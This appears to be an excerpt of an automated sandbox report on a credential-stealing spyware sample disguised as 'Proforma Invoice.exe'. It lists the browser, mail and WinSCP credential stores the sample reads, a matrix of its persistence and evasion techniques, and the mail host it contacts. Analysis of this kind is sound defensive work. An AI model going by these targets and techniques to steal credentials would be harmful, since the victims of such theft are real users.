                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Users\user\AppData\Roaming\VoAlKljQu.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Users\user\AppData\Roaming\VoAlKljQu.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3599970.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25d0894.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b80898.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.2a00cd0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2fb0ce8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2fb0ce8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b70880.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5000000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2f72f20.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b70880.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5080000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29b3ed8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29b8ef0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25c087c.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.2a00cd0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29c2f08.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b80898.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3599970.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25d0894.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b80898.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.2a00cd0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2fb0ce8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2fb0ce8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b70880.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5000000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2f72f20.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b70880.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.5080000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29b3ed8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29b8ef0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25c087c.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.2a00cd0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Proforma Invoice.exe.29c2f08.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.VoAlKljQu.exe.2b80898.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Scheduled Task/Job
                        3
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        1
                        Query Registry
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                        Software Packing
                        NTDS211
                        Security Software Discovery
                        Distributed Component Object Model21
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        Process Discovery
                        SSH1
                        Clipboard Data
                        23
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials141
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                        Virtualization/Sandbox Evasion
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1399273 Sample: Proforma Invoice.exe Startdate: 27/02/2024 Architecture: WINDOWS Score: 100 42 mail.elec-qatar.com 2->42 44 api.ipify.org 2->44 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 15 other signatures 2->56 8 VoAlKljQu.exe 5 2->8         started        11 Proforma Invoice.exe 7 2->11         started        signatures3 process4 file5 58 Multi AV Scanner detection for dropped file 8->58 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->60 62 Machine Learning detection for dropped file 8->62 14 VoAlKljQu.exe 8->14         started        17 schtasks.exe 8->17         started        38 C:\Users\user\AppData\Roaming\VoAlKljQu.exe, PE32 11->38 dropped 40 C:\Users\user\AppData\Local\...\tmp2AAD.tmp, XML 11->40 dropped 64 Adds a directory exclusion to Windows Defender 11->64 66 Injects a PE file into a foreign processes 11->66 19 Proforma Invoice.exe 15 2 11->19         started        22 powershell.exe 23 11->22         started        24 powershell.exe 23 11->24         started        26 schtasks.exe 1 11->26         started        signatures6 process7 dnsIp8 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->68 70 Tries to steal Mail credentials (via file / registry access) 14->70 72 Tries to harvest and steal browser information (history, passwords, etc) 14->72 28 conhost.exe 17->28         started        46 mail.elec-qatar.com 50.87.139.143, 49736, 49739, 587 UNIFIEDLAYER-AS-1US United States 19->46 48 api.ipify.org 172.67.74.152, 443, 49734, 49738 CLOUDFLARENETUS United States 19->48 74 Installs a global keyboard hook 19->74 30 conhost.exe 22->30         started        32 WmiPrvSE.exe 22->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Proforma Invoice.exe63%ReversingLabsWin32.Spyware.Negasteal
                        Proforma Invoice.exe65%VirustotalBrowse
                        Proforma Invoice.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\VoAlKljQu.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\VoAlKljQu.exe63%ReversingLabsWin32.Spyware.Negasteal
